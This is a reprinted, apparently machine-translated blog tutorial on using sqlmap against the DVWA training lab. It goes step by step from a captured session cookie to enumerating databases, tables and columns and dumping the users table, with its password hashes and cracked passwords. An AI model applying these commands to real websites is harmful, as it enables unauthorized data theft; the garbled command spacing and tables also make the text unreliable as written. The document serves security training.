SQL Injection (reprint)

1, use the Firefox browser (install a Firebug plugin) login to http://192.168.204.132/dvwa/login.php page, using Admin/password

2. Open the cookie panel of the Firebug tool and copy all cookies. Get:

phpsessid=5v6mbqac21vrocg5gj1vp0njl2, path=/, domain=192.168.204.132
Security=low; path=/dvwa/; domain=192.168.204.132

3, open the DVWA SQL injection page , enter 1 in the User ID input box, click the Submit button. Get the URL to test from the address bar:

http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

4, open the terminal from Kali, data sqlmap, there will be a prompt document.

5. Start testing the URL for a SQL injection vulnerability in terminal input:

sqlmap-u ' http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# '--cookie= ' phpsessid= 5v6mbqac21vrocg5gj1vp0njl2;security=low '

Get information results:

Web server operating system:windowsweb application technology:php 5.3.29, Apache 2.4.18back-end dbms:mysql >= 5.5

6. Start probing the name of the database used to store the application data in MySQL and enter it at the terminal:

sqlmap-u ' http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# '--cookie= ' phpsessid= 5v6mbqac21vrocg5gj1vp0njl2;security=low '--dbs-v 0

Get information results:

Available databases [5]:[*] dvwa[*] information_schema[*] mysql[*] performance_schema[*] Test

7, get the database is DVWA, start to get the database exists in the table, in the terminal input:

sqlmap-u ' http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# '--cookie= ' phpsessid= 5v6mbqac21vrocg5gj1vp0njl2;security=low '-D dvwa--tables

Get information results:

Database:dvwa[2 tables]+-----------+| Guestbook | | Users     |+-----------+

8, get two tables, get the Users table field, in the terminal input:

sqlmap-u ' http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# '--cookie= ' phpsessid= 5v6mbqac21vrocg5gj1vp0njl2;security=low '-D dvwa--tables-t users--columns

Get information results:

Table:users[8 columns]+--------------+-------------+| Column       | Type        |+--------------+-------------+| user         | varchar | | | Avatar       | varchar | | | failed_login | INT (3) c4/>| | first_name | varchar | |   | last_login   | timestamp   | | last_name    | varchar (All) | | | password     | varchar (32) | | user_id      | int (6)      |+--------------+-------------+

9, finally can bar table data export, in the terminal input:

sqlmap-u ' http://192.168.204.132/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# '--cookie= ' phpsessid= 5v6mbqac21vrocg5gj1vp0njl2;security=low '-D dvwa--tables-t users--columns--dump

Get information results:

Table:users

[5 entries]+---------+--------------------------------------------------+---------+---------------------------- -----------------+-----------+------------+---------------------+--------------+| user_id | Avatar | user | password | last_name | first_name | Last_login | Failed_login |+---------+--------------------------------------------------+---------+------------------------- --------------------+-----------+------------+---------------------+--------------+| 1 | http://127.0.0.1/DVWA/hackable/users/admin.jpg | admin | 5F4DCC3B5AA765D61D8327DEB882CF99 (password) | admin | admin | 2017-04-01 00:58:43 | 0 | | 2 | http://127.0.0.1/DVWA/hackable/users/gordonb.jpg | gordonb | E99A18C428CB38D5F260853678922E03 (abc123) | Brown | Gordon | 2017-04-01 00:58:43 | 0 | | 3 | http://127.0.0.1/DVWA/hackable/users/1337.jpg | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (Charley) | Me | Hack | 2017-04-01 00:58:43 | 0 | | 4 | http://127.0.0.1/DVWA/hackable/users/pablo.jpg | Pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 (Letmein) | Picasso | Pablo | 2017-04-01 00:58:43 | 0 | | 5 | http://127.0.0.1/DVWA/hackable/users/smithy.jpg | Smithy | 5F4DCC3B5AA765D61D8327DEB882CF99 (password) | Smith | Bob | 2017-04-01 00:58:43 | 0 |+---------+--------------------------------------------------+---------+------------------------------------ ---------+-----------+------------+---------------------+--------------+

[INFO] table ' dvwa.users ' dumped to CSV file '/root/.sqlmap/output/192.168.204.132/dump/dvwa/users.csv '

and export CSV data to local! Also found a surprise number, according to the vault cipher also to decipher!!

Give some options for Sqlmap: (Sqlmap-h will give the English help document)
–cookie: Set Our cookie value "set DVWA security level from high to low"
-u: Specify Destination URL
-B: Get DBMS Banner
–CURRENT-DB: Getting the current database
–current-user: Get Current user

–string: Used to match strings in a page when a query is available
–users: Enumerating DBMS users
–password: Enumerate DBMS user password hash

–dbs: Enumerating databases in the DBMS

-D: DBMS database to enumerate
–tables: Enumerating data tables in the DBMS database

–columns: Enumerating all columns in a DBMS database table

-T: DBMS data table to enumerate

-C: The columns in the DBMS data table to enumerate

–dump: Dump DBMS data table entry

Thank you very much for Yumbo's share of the main benefits: http://blog.csdn.net/qq_20745827/article/details/68953621

SQL Injection (reprint)